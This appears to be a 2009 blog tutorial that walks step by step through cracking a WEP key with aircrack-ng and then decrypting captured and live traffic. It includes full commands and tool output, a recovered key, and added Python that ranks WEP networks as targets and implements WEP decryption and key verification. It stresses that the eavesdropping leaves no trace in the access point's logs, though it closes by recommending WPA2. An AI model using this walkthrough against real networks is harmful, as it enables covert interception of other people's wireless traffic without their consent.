Aug 09 2009
How to crack a WEP key and decrypt live traffic
Cracking a WEP key is extremely easy: once enough traffic has been captured, recovering the key is a matter of seconds. Truth? Pretty much… We are also going to decrypt traffic in real time, without ever associating with the wireless access point.
All steps are run as root, since the interface state needs to be changed.
Aircrack Installation
Download and install aircrack-ng. It’s available on most Linux distributions in a package format.
On Debian, run
apt-get install aircrack-ng
Aircrack provides tools to capture packets, crack the WEP key, and decrypt live traffic.
We’ll run the tests with a Linksys PCMCIA wifi card. A simple ifconfig displays the card’s network statistics, which tells us it has been detected.
root@crack_WEP:~$ ifconfig
wlan0 Link encap:Ethernet HWaddr 00:1a:70:6b:37:4e
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:22 errors:0 dropped:0 overruns:0 frame:0
TX packets:63 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3742 (3.7 KB) TX bytes:10773 (10.7 KB)
Capturing Packets
First, the interface needs to be switched to monitor mode.
root@crack_WEP:~$ airmon-ng
Interface Chipset Driver
wlan0 Broadcom 43xx b43 - [phy0]
Airmon-ng has detected the interface as wlan0. It could of course have a different name, such as ath0.
root@crack_WEP:~$ airmon-ng stop wlan0
Interface Chipset Driver
wlan0 Broadcom 43xx b43 - [phy0]
(monitor mode disabled)
root@crack_WEP:~$ airmon-ng start wlan0
Interface Chipset Driver
wlan0 Broadcom 43xx b43 - [phy0]
(monitor mode enabled on mon0)
Running iwconfig shows mon0 has been added in addition to the original interface wlan0:
root@crack_WEP:~$ iwconfig
wlan0 IEEE 802.11bg ESSID:""
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
We can now scan the available networks around the place:
root@crack_WEP:~$ airodump-ng mon0
CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:A0:C5:FF:84:72 197 4 0 0 1 11 WEP WEP private
BSSID STATION PWR Rate Lost Packets Probes
The scan shows an access point with MAC address 00:A0:C5:FF:84:72, ESSID "private", emitting on channel 1 with WEP encryption.
Now that the target is defined, we need to capture the packets exchanged between the access point and its clients. The capture runs on the monitor-mode interface mon0, locked to the AP’s channel and BSSID so that only its traffic is written to disk:
root@crack_WEP:~$ airodump-ng --channel 1 --bssid 00:A0:C5:FF:84:72 --write temp mon0
CH 1 ][ Elapsed: 31 mins ][ 2009-05-02 21:52
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:A0:C5:FF:84:72 205 10 6058 24496 0 1 54 WEP WEP private
BSSID STATION PWR Rate Lost Packets Probes
00:A0:C5:FF:84:72 00:18:4D:76:30:EB 188 54-54 0 24795
Packets are written to .cap files named with the temp prefix (temp-01.cap and so on, alongside CSV and text summaries).
Cracking techniques keep getting more efficient: with the PTW attack used below, a 104-bit key is typically recovered from 40,000 to 85,000 unique IVs (data packets). Capture time varies with the amount of traffic on the link; the #Data column of airodump-ng shows how many IVs have been collected so far.
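Picking the target from an airodump-ng scan is easy by eye with one AP in range, less so with dozens. The following Python is an added example, not code from the original post or from the aircrack-ng project: it reads the CSV summary that airodump-ng writes next to the .cap file when run with --write, lists the WEP networks sorted by collected IVs, flags those past the rough 40,000-IV mark, and prints the capture command used above. The sample CSV is constructed inline (its first row mirrors the access point on this page) and the column header layout is assumed; the parser keys fields by header name, so a differing column order is harmless but renamed columns would need the lookups adjusted.

```python
"""Added example (not from the original post or aircrack-ng): triage an
airodump-ng CSV dump to pick WEP targets and build the capture command line."""
import csv

# Constructed sample in the layout airodump-ng writes alongside the .cap when run
# with --write (assumption: the two header rows below; the parser keys columns by
# name rather than by position). The first AP row mirrors the one seen on this page.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:A0:C5:FF:84:72, 2009-08-08 18:01:00, 2009-08-08 18:32:00,  1,  54, WEP , WEP, , 205, 6058, 24496,   0.  0.  0.  0,  7, private, 
00:11:22:33:44:55, 2009-08-08 18:01:00, 2009-08-08 18:02:00,  6,  54, WPA2, CCMP, PSK, 120,   40,     0,   0.  0.  0.  0,  6, office, 
00:66:77:88:99:AA, 2009-08-08 18:01:00, 2009-08-08 18:30:00, 11,  11, WEP , WEP, , 150,  900, 41300,   0.  0.  0.  0,  5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:18:4D:76:30:EB, 2009-08-08 18:01:00, 2009-08-08 18:32:00, 188, 24795, 00:A0:C5:FF:84:72, private
00:1C:B3:09:85:15, 2009-08-08 18:05:00, 2009-08-08 18:06:00, 100, 12, (not associated), guest
"""

PTW_IV_HINT = 40000  # rough IV count at which PTW usually recovers a 104-bit key


def _parse_section(lines):
    """One CSV section: first row is the header; values are padded, so strip them."""
    rows = csv.reader(lines, skipinitialspace=True)
    header = [h.strip() for h in next(rows)]
    records = []
    for row in rows:
        cells = [c.strip() for c in row]
        if any(cells):
            records.append(dict(zip(header, cells)))
    return records


def parse_airodump_csv(text):
    """Split the dump into its AP and station sections (separated by blank lines)."""
    sections, current = [], []
    for line in text.splitlines():
        if line.strip():
            current.append(line)
        elif current:
            sections.append(current)
            current = []
    if current:
        sections.append(current)
    aps = _parse_section(sections[0]) if sections else []
    stations = _parse_section(sections[1]) if len(sections) > 1 else []
    return aps, stations


def wep_targets(aps):
    """WEP networks only, the ones with the most collected IVs first."""
    wep = [ap for ap in aps if ap["Privacy"].upper().startswith("WEP")]
    return sorted(wep, key=lambda ap: int(ap["# IV"]), reverse=True)


def clients_of(stations, bssid):
    """Stations associated with a BSSID: their data frames are the IVs we need."""
    return [s["Station MAC"] for s in stations if s["BSSID"].upper() == bssid.upper()]


def enough_ivs(ap, threshold=PTW_IV_HINT):
    """True once the AP has yielded enough IVs to make a PTW run worthwhile."""
    return int(ap["# IV"]) >= threshold


def capture_command(ap, prefix="temp", iface="mon0"):
    """The airodump-ng invocation used on this page, locked to channel and BSSID."""
    return f"airodump-ng --channel {ap['channel']} --bssid {ap['BSSID']} --write {prefix} {iface}"


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for ap in wep_targets(aps):
        status = "ready for aircrack-ng" if enough_ivs(ap) else "keep capturing"
        print(f"{ap['BSSID']} ch {ap['channel']:>2} {ap['ESSID']!r:12} IVs={ap['# IV']:>6} "
              f"clients={clients_of(stations, ap['BSSID'])} -> {status}")
        print("   ", capture_command(ap))
```

Run against a real temp-01.csv by replacing SAMPLE_CSV with the file contents; the WPA2 network is filtered out because nothing on this page applies to it, and an AP with no associated client is worth noting, since without client traffic the IV count will barely move.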
Cracking the WEP key
It is now time to crack the WEP key. The -z option selects the PTW attack (now the default), -b restricts the analysis to our target BSSID, and the glob picks up every capture file airodump-ng wrote with the temp prefix:
root@crack_WEP:~$ aircrack-ng -z -b 00:A0:C5:FF:84:72 temp-0*.cap
Aircrack-ng 1.0 rc1
[00:00:22] Tested 240228 keys (got 41742 IVs)
KB depth byte(vote)
0 0/ 1 B9(58880) A0(50688) 12(50176) F5(49920) 9E(48896) CD(48640)
1 0/ 1 19(54784) E8(52480) FA(52480) 4B(51456) 79(51456) DD(49664)
2 0/ 1 31(59648) EA(53504) 40(50688) 0A(50432) 88(50432) 0E(50176)
3 0/ 1 8C(60416) 05(49152) 56(49152) 23(48640) 52(48384) 03(48128)
4 0/ 1 B2(59136) AE(49664) 78(49152) FE(49152) 8B(48384) 9C(47616)
5 0/ 1 61(53504) E6(50688) FF(50176) 13(49664) 23(49408) C7(49408)
6 0/ 1 DD(56320) C4(51968) 90(50688) 0C(50176) CF(49920) CE(49152)
7 0/ 1 4E(53248) E6(51968) 7D(49152) 0B(48896) 90(48896) 06(48640)
8 0/ 1 FB(52224) C1(49664) E9(48128) 3D(47616) F0(47360) EB(47104)
9 0/ 1 0B(54784) BC(51712) 52(50432) 54(49920) F5(49920) CA(48896)
10 0/ 1 E6(50944) 1C(49920) 5F(49408) 1F(49152) 0A(48896) 83(48896)
11 2/ 1 FF(49664) 17(48384) 94(48128) 27(47872) 23(47616) B2(47616)
12 0/ 4 91(50452) A4(50360) 77(50156) 78(49540) FF(49476) 70(48788)
KEY FOUND! [ B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99 ]
Decrypted correctly: 100%
That’s right, the key was cracked in 22 seconds! Two things to note: the key is 13 bytes long, i.e. 104-bit WEP (usually marketed as "128-bit"), and the 22 seconds are the offline cracking step alone. The 31-minute capture above is where the time really goes; aircrack-ng can be rerun against the growing capture file until a key comes out.
Decrypting Traffic
The traffic can be captured into .cap files as above, decrypted into a second file, and then fed to tcpdump, for instance:
root@crack_WEP:~$ airdecap-ng -w b919318cb261dd4efb0baa6299 temp-01.cap
Total number of packets read 22072
Total number of WEP data packets 6245
Total number of WPA data packets 0
Number of plaintext data packets 3
Number of decrypted WEP packets 6245
Number of corrupted WEP packets 0
Number of decrypted WPA packets 0
airdecap-ng writes the decrypted frames to temp-01-dec.cap (the -w argument is the key in hex). That file is read offline, so tcpdump takes -r and no interface:
root@crack_WEP:~$ tcpdump -r temp-01-dec.cap
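What airdecap-ng and airtun-ng do with the key, and what aircrack-ng’s "Decrypted correctly: 100%" line measures, fits in a few lines of Python. The block below is an added example written for this page, not code from the original post or from the aircrack-ng project; it uses the key recovered above, but the frames, IVs and payloads are constructed inline and the RC4 and CRC-32 routines are textbook implementations rather than the tool’s. A WEP frame body carries the 24-bit IV in clear, a key-index byte, then RC4(IV || key) applied to plaintext || CRC-32 ICV, so holding the key is enough to decrypt any frame passively, and the ICV is the oracle that tells a cracker (or this script) whether a candidate key is right. The last function shows why the small IV space matters: two frames under the same IV share a keystream, and XORing their ciphertexts cancels it.

```python
"""Added example: what airdecap-ng / aircrack-ng's ICV check do, in plain Python.

WEP = RC4 keyed with IV(3 bytes, sent in clear) || shared key, plus a CRC-32
"ICV" appended to the plaintext before encryption. Anyone holding the key can
decrypt passively; a candidate key is "verified" by checking the ICV.
"""
import zlib

# The 104-bit key recovered on this page; everything else below is constructed sample data.
KEY = bytes.fromhex("b919318cb261dd4efb0baa6299")


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling (KSA), then keystream (PRGA) XORed with data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Build a WEP frame body: IV | KeyID byte | RC4(IV||key, plaintext || ICV)."""
    assert len(iv) == 3
    return iv + bytes([(key_id & 3) << 6]) + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes):
    """Decrypt one frame body; return the plaintext, or None if the ICV does not match."""
    iv, ciphertext = body[:3], body[4:]
    decrypted = rc4(iv + key, ciphertext)
    plaintext, tag = decrypted[:-4], decrypted[-4:]
    return plaintext if icv(plaintext) == tag else None


def verify_key(key: bytes, bodies) -> float:
    """Fraction of frames whose ICV checks out under `key` (aircrack's 'Decrypted correctly: N%')."""
    good = sum(1 for b in bodies if wep_decrypt(key, b) is not None)
    return good / len(bodies)


def xor_reused_iv(body_a: bytes, body_b: bytes):
    """Two frames sharing an IV share a keystream: XOR of ciphertexts = XOR of (plaintext||ICV)s."""
    if body_a[:3] != body_b[:3]:
        return None
    return bytes(x ^ y for x, y in zip(body_a[4:], body_b[4:]))


# Constructed sample traffic: LLC/SNAP header for IPv4 followed by made-up payloads.
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")
PLAINTEXTS = [LLC_SNAP_IP + b"constructed payload one", LLC_SNAP_IP + b"constructed payload two!"]
IVS = [bytes.fromhex("0c0102"), bytes.fromhex("7f3a00")]
FRAMES = [wep_encrypt(KEY, iv, pt) for iv, pt in zip(IVS, PLAINTEXTS)]
WRONG_KEY = bytes.fromhex("b919318cb261dd4efb0baa6298")  # last byte off by one

if __name__ == "__main__":
    print("correct key :", verify_key(KEY, FRAMES))
    print("wrong key   :", verify_key(WRONG_KEY, FRAMES))
    print("decrypted   :", wep_decrypt(KEY, FRAMES[0]))
    reused = wep_encrypt(KEY, IVS[0], PLAINTEXTS[1])  # same IV as FRAMES[0]: keystream reuse
    print("iv reuse    :", xor_reused_iv(FRAMES[0], reused))
```

The correct key decrypts 100% of the sample frames while the key with one byte changed decrypts none; a real cracker applies the same ICV test to a handful of captured frames before printing KEY FOUND. An ICV passing under a wrong key is a 2^-32 event per frame, which is why a few frames are enough to confirm a candidate.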
But it is also possible to decrypt live traffic in real time by sending it to a virtual interface, at0, on which we can listen as with any real interface. airtun-ng, provided in the aircrack-ng package, does exactly this: -a is the target BSSID, -w the WEP key in hex, and mon0 the monitor-mode interface the frames are read from.
root@crack_WEP:~$ airtun-ng -a 00:A0:C5:FF:84:72 -w b919318cb261dd4efb0baa6299 mon0
created tap interface at0
WEP encryption specified. Sending and receiving frames through mon0.
FromDS bit set in all frames.
From another shell:
root@crack_WEP:~$ tcpdump -i at0
Conclusion
It is indeed very easy to crack a WEP key and listen to the traffic without associating to the access point, hence without leaving any trace in its logs: everything above is passive, and only active injection (used to speed up IV collection) produces frames the access point could notice. Take care to use at least WPA, preferably WPA2, with a long passphrase that is not based on dictionary words.
Sometimes it is difficult to manage airodump-ng output files. I mean, once I generate those csv and xml files and then start looking into them, for a large amount of data I can’t figure it out. So are there any tools or services available for analysis and visualization?
I have used this website and it is quite good; here I have shared my sample data, have a look, and also share any other sources if anyone knows of them. – http://bit.ly/1Nbfgm6